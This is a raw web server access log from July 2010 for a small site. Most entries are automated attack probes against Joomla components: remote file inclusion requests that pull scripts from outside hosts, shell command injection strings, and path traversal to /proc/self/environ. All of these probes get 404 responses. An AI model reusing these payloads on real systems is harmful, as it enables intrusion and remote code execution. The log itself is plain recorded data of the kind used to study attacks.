211.202.2.34 - - [26/Jul/2010:10:15:36 -0700] "GET /logs/access_100621.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:22:46 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:22:46 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:22:46 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:22:47 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:22:47 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:22:47 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:26:32 -0700] "GET /logs/access_100614.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:26:33 -0700] "GET /logs/access_100614.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
66.163.171.206 - - [26/Jul/2010:10:29:13 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
174.123.133.162 - - [26/Jul/2010:10:32:16 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
174.123.133.162 - - [26/Jul/2010:10:32:28 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
76.13.114.106 - - [26/Jul/2010:10:33:44 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
174.123.133.162 - - [26/Jul/2010:10:34:21 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
74.53.98.146 - - [26/Jul/2010:10:37:37 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mymw.info//ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
74.55.73.74 - - [26/Jul/2010:10:49:50 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
74.55.73.74 - - [26/Jul/2010:10:49:50 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
216.129.119.47 - - [26/Jul/2010:10:52:05 -0700] "GET /logs/access_100614.log HTTP/1.1" 200 93466 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "redneckmba.com"
76.13.114.106 - - [26/Jul/2010:11:01:54 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
118.170.198.228 - - [26/Jul/2010:11:02:19 -0700] "GET /logs/access_100621.log HTTP/1.1" 200 483276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
76.13.123.195 - - [26/Jul/2010:11:18:14 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
89.108.64.192 - - [26/Jul/2010:11:22:04 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.redneckmba.com"
76.13.114.106 - - [26/Jul/2010:11:31:48 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.206 - - [26/Jul/2010:11:36:33 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
64.27.0.108 - - [26/Jul/2010:11:38:22 -0700] "GET /logs/access.log HTTP/1.1" 200 132198 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:11:41:55 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "redneckmba.com"
211.202.2.34 - - [26/Jul/2010:11:41:55 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "redneckmba.com"
211.202.2.34 - - [26/Jul/2010:11:42:26 -0700] "GET /logs/access_100621.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "redneckmba.com"
211.202.2.34 - - [26/Jul/2010:11:42:26 -0700] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "redneckmba.com"
211.202.2.34 - - [26/Jul/2010:11:42:26 -0700] "GET /logs/access_100621.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "redneckmba.com"
211.202.2.34 - - [26/Jul/2010:11:42:26 -0700] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "redneckmba.com"
213.229.106.147 - - [26/Jul/2010:11:53:26 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
213.229.106.147 - - [26/Jul/2010:11:53:26 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
213.229.106.147 - - [26/Jul/2010:11:53:26 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
213.229.106.147 - - [26/Jul/2010:11:53:42 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
213.229.106.147 - - [26/Jul/2010:11:53:42 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
213.229.106.147 - - [26/Jul/2010:11:53:43 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
213.229.106.147 - - [26/Jul/2010:11:56:37 -0700] "GET /logs/access_100614.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
213.229.106.147 - - [26/Jul/2010:11:57:23 -0700] "GET /logs/access_100614.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.114.106 - - [26/Jul/2010:12:02:25 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:08:35 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:08:58 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:10:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:11:07 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:11:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:13:13 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:13:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:12:14:55 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:12:15:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:19:18 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:19:18 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:19:19 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:23:20 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:23:20 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:23:20 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:26:40 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:26:41 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:26:41 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
76.13.114.105 - - [26/Jul/2010:12:33:09 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:35:24 -0700] "GET /logs/access_100614.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:35:24 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:35:25 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:38:41 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:38:41 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:12:38:41 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
66.163.171.206 - - [26/Jul/2010:12:44:31 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.127.248.175 - - [26/Jul/2010:12:44:51 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:12:44:51 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:12:44:52 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:12:45:11 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:12:45:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [26/Jul/2010:12:45:12 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
76.13.123.195 - - [26/Jul/2010:12:54:12 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [26/Jul/2010:13:06:06 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
212.227.118.34 - - [26/Jul/2010:13:36:33 -0700] "GET /u/?DOCUMENT_ROOT=http://rollax.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
212.227.118.34 - - [26/Jul/2010:13:36:33 -0700] "GET /logs/u/?DOCUMENT_ROOT=http://rollax.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
64.182.124.1 - - [26/Jul/2010:13:37:51 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dedy.fileave.com/alita/id3.txt??? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "redneckmba.com"
64.182.124.1 - - [26/Jul/2010:13:37:51 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dedy.fileave.com/alita/id3.txt??? HTTP/1.0" 404 - "-" "libwww-perl/5.53" "redneckmba.com"
76.13.114.106 - - [26/Jul/2010:13:41:05 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
206.214.220.151 - - [26/Jul/2010:13:49:10 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dedy.fileave.com/alita/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
206.214.220.151 - - [26/Jul/2010:13:49:10 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dedy.fileave.com/alita/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
206.214.220.151 - - [26/Jul/2010:13:52:54 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dedy.fileave.com/alita/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
206.214.220.151 - - [26/Jul/2010:13:56:50 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dedy.fileave.com/alita/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
206.214.220.151 - - [26/Jul/2010:13:56:50 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dedy.fileave.com/alita/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
206.214.220.151 - - [26/Jul/2010:13:56:51 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dedy.fileave.com/alita/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
66.163.171.206 - - [26/Jul/2010:13:59:38 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
46.98.70.222 - - [26/Jul/2010:14:10:27 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]" "www.redneckmba.com"
46.98.70.222 - - [26/Jul/2010:14:10:17 -0700] "GET / HTTP/1.0" 200 763 "http://www.redneckmba.com/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]" "www.redneckmba.com"
76.13.114.105 - - [26/Jul/2010:14:17:54 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [26/Jul/2010:14:42:05 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
206.214.220.151 - - [26/Jul/2010:14:48:35 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dedy.fileave.com/alita/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
93.42.216.165 - - [26/Jul/2010:14:48:46 -0700] "GET /logs/access_100614.logcomponents/com_mp3_allopass/allopass.php?mosConfig_live_site=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "redneckmba.com"
93.42.216.165 - - [26/Jul/2010:14:48:46 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "redneckmba.com"
93.42.216.165 - - [26/Jul/2010:14:48:47 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "redneckmba.com"
76.13.114.107 - - [26/Jul/2010:14:54:29 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
62.149.171.147 - - [26/Jul/2010:15:00:09 -0700] "GET /logs/access.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
62.149.171.147 - - [26/Jul/2010:15:00:09 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
62.149.171.147 - - [26/Jul/2010:15:00:10 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
66.163.171.205 - - [26/Jul/2010:15:20:20 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.105 - - [26/Jul/2010:15:31:30 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:03:55 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:03:55 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
